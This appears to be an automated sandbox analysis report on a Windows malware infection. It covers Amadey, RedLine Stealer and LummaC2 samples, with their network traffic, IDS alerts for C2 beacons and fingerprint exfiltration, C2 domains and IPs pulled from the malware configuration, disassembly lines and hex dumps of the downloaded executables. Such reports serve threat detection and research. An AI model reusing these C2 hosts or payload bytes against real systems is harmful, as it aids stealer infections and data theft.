Source: unknown	HTTPS traffic detected: 3.5.27.203:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:52894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:52893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52935 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4500436480.0000000005314000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdb source: Installer.exe, 0000000D.00000002.2552418569.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp, Installer.exe, 0000000D.00000000.2198725612.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdbGCTL source: Installer.exe, 0000000D.00000002.2552418569.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp, Installer.exe, 0000000D.00000000.2198725612.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: BitLockerToGo.pdb source: taskweaker.exe, 00000024.00000003.2493780033.00000231C7730000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2508846251.000000C0001FE000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000003.2493835629.00000231C76F0000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2510607407.000000C000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4489596109.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4500436480.0000000005322000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4500436480.0000000005327000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4492467158.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: taskweaker.exe, 00000024.00000003.2493780033.00000231C7730000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2508846251.000000C0001FE000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000003.2493835629.00000231C76F0000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2510607407.000000C000400000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009FD5E1 FindFirstFileExW,	5_2_009FD5E1
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_0010DAAD FindFirstFileExW,	9_2_0010DAAD
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BCDAAD FindFirstFileExW,	11_2_00BCDAAD

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_069171E0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 06918E55h	4_2_06918A88
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 06918E55h	4_2_06918A78
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 077780A2h	4_2_07777C80
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 07778522h	4_2_07777C80
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 07778AF9h	4_2_07778841
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 07772AFBh	4_2_077728C8
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 077771B7h	4_2_0777719F
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4x nop then jmp 0777491Dh	4_2_077748FC
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	8_2_005E7D03
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 8253457Eh	8_2_005E8D2F
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_005D5066
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_005CA080
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1A7C99FCh	8_2_005E7170
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_005C610A
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000888h]	8_2_005CF190
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp cl, 0000002Eh	8_2_005D1190
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov byte ptr [edx], cl	8_2_005D1190
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov ebx, eax	8_2_005D1190
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then jmp ecx	8_2_005EB1A7
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]	8_2_005B8250
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	8_2_005BD270
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then inc ebx	8_2_005EB26C
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 077DEFCDh	8_2_005EC220
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_005C6311
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_005CA390
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then movzx edi, ax	8_2_005D63B2
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_005D63B2
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	8_2_005BF460
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then jmp edx	8_2_005CC48E
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov byte ptr [edx], cl	8_2_005D16F0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov ebx, eax	8_2_005D16F0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_005D46A0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000888h]	8_2_005CF740
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h	8_2_005CF740
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_005EA720
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	8_2_005BF878
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_005B9860
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_005EB9F0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000230h]	8_2_005C19B0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp byte ptr [edx+eax], cl	8_2_005B3A40
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov edi, ebx	8_2_005E7A20
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000D8h]	8_2_005C2A98
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then jmp ecx	8_2_005D1B66
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	8_2_005D3B20
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_005CFBC0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	8_2_005C4BF5
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_005E2C70
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_005B9CE0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 36E97270h	8_2_005ECC90
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	8_2_005C4D20
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 8253457Eh	8_2_005E8DC6
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [ebx+ecx*8], AC3673B8h	8_2_005E6DE0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], B33E16A3h	8_2_005E6DE0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	8_2_005B2E30
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov byte ptr [eax], cl	8_2_005D5E30
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 4x nop then mov byte ptr [eax], cl	8_2_005D5E9D

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49705 -> 77.91.77.81:80
Source: Traffic	Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.81:80 -> 192.168.2.5:49705
Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49705 -> 77.91.77.81:80
Source: Traffic	Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49706 -> 77.91.77.81:80
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.5:49707 -> 185.215.113.67:40960
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49707 -> 185.215.113.67:40960
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 185.215.113.67:40960 -> 192.168.2.5:49707
Source: Traffic	Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49708 -> 77.91.77.81:80
Source: Traffic	Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49710 -> 77.91.77.81:80
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 185.215.113.67:40960 -> 192.168.2.5:49707
Source: Traffic	Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49712 -> 77.91.77.81:80
Source: Traffic	Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 185.172.128.116:80 -> 192.168.2.5:49718
Source: Traffic	Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49723 -> 77.91.77.81:80
Source: Traffic	Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49725 -> 77.91.77.81:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: barebrilliancedkoso.shop
Source: Malware configuration extractor	URLs: parallelmercywksoffw.shop
Source: Malware configuration extractor	URLs: ohfantasyproclaiwlo.shop
Source: Malware configuration extractor	URLs: landdumpycolorwskfw.shop
Source: Malware configuration extractor	URLs: flourhishdiscovrw.shop
Source: Malware configuration extractor	URLs: conferencefreckewl.shop
Source: Malware configuration extractor	URLs: notoriousdcellkw.shop
Source: Malware configuration extractor	URLs: liabiliytshareodlkv.shop
Source: Malware configuration extractor	URLs: liabiliytshareodlkv.shop
Source: Malware configuration extractor	URLs: barebrilliancedkoso.shop
Source: Malware configuration extractor	URLs: parallelmercywksoffw.shop
Source: Malware configuration extractor	URLs: ohfantasyproclaiwlo.shop
Source: Malware configuration extractor	URLs: landdumpycolorwskfw.shop
Source: Malware configuration extractor	URLs: flourhishdiscovrw.shop
Source: Malware configuration extractor	URLs: conferencefreckewl.shop
Source: Malware configuration extractor	URLs: notoriousdcellkw.shop
Source: Malware configuration extractor	URLs: liabiliytshareodlkv.shop
Source: Malware configuration extractor	URLs: liabiliytshareodlkv.shop
Source: Malware configuration extractor	URLs: barebrilliancedkoso.shop
Source: Malware configuration extractor	URLs: parallelmercywksoffw.shop
Source: Malware configuration extractor	URLs: ohfantasyproclaiwlo.shop
Source: Malware configuration extractor	URLs: landdumpycolorwskfw.shop
Source: Malware configuration extractor	URLs: flourhishdiscovrw.shop
Source: Malware configuration extractor	URLs: conferencefreckewl.shop
Source: Malware configuration extractor	URLs: notoriousdcellkw.shop
Source: Malware configuration extractor	URLs: liabiliytshareodlkv.shop
Source: Malware configuration extractor	URLs: liabiliytshareodlkv.shop
Source: Malware configuration extractor	IPs: 185.172.128.116
Source: Malware configuration extractor	URLs: 4.185.27.237:13528

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 4.185.27.237 ports 1,2,3,13528,5,8

Performs DNS queries to domains with low reputation

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: starjod.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: starjod.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: starjod.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: starjod.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: findalltechs.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: findalltechs.xyz

Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 185.215.113.67:40960
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 4.185.27.237:13528

Source: global traffic

TCP traffic: 192.168.2.5:52890 -> 162.159.36.2:53

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: starjod.xyz to https://www.google.com/url?q=https%3a%2f%2ffindalltechs.xyz%2fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2f&sa=d&sntz=1&usg=aovvaw2c6cv2mom3tf_tzbyuuner
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: starjod.xyz to https://www.google.com/url?q=https%3a%2f%2ffindalltechs.xyz%2fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2f&sa=d&sntz=1&usg=aovvaw2c6cv2mom3tf_tzbyuuner

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Jun 2024 22:10:04 GMTContent-Type: application/octet-streamContent-Length: 304128Last-Modified: Sat, 22 Jun 2024 22:39:30 GMTConnection: keep-aliveETag: "667752a2-4a400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 54 ad b0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 02 00 00 d0 01 00 00 00 00 00 ba 9f 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 9f 02 00 4f 00 00 00 00 00 03 00 bc c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 0c 00 00 00 4c 9f 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 cf 02 00 00 20 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc c9 01 00 00 00 03 00 00 cc 01 00 00 d4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 04 00 00 04 00 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Jun 2024 22:10:06 GMTContent-Type: application/octet-streamContent-Length: 535080Last-Modified: Sun, 09 Jun 2024 13:04:14 GMTConnection: keep-aliveETag: "6665a84e-82a28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 89 a3 07 88 e8 cd 54 88 e8 cd 54 88 e8 cd 54 5b 9a ce 55 84 e8 cd 54 5b 9a c8 55 23 e8 cd 54 5b 9a c9 55 9d e8 cd 54 4a 69 c9 55 9a e8 cd 54 5b 9a cc 55 8d e8 cd 54 88 e8 cc 54 0a e8 cd 54 4a 69 c8 55 d4 e8 cd 54 4a 69 ce 55 90 e8 cd 54 7b 6a c8 55 89 e8 cd 54 7b 6a 32 54 89 e8 cd 54 7b 6a cf 55 89 e8 cd 54 52 69 63 68 88 e8 cd 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fe d4 64 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 5a 02 00 00 b8 05 00 00 00 00 00 e9 9c 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 1d 03 00 3c 00 00 00 00 10 08 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 04 08 00 28 26 00 00 00 20 08 00 28 22 00 00 78 f0 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f0 02 00 18 00 00 00 b8 ef 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8b 59 02 00 00 10 00 00 00 5a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1a b6 00 00 00 70 02 00 00 b8 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc d8 04 00 00 30 03 00 00 c8 04 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 10 08 00 00 02 00 00 00 de 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 28 22 00 00 00 20 08 00 00 24 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Jun 2024 22:10:09 GMTContent-Type: application/octet-streamContent-Length: 317952Last-Modified: Mon, 10 Jun 2024 00:19:35 GMTConnection: keep-aliveETag: "66664697-4da00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 af 09 63 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c0 03 00 00 16 01 00 00 00 00 00 b0 92 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 f6 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 ec 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c f7 03 00 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 03 00 00 10 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 37 2a 00 00 00 d0 03 00 00 2c 00 00 00 c4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 2b 01 00 00 00 04 00 00 98 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 ec 51 00 00 00 30 05 00 00 52 00 00 00 88 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 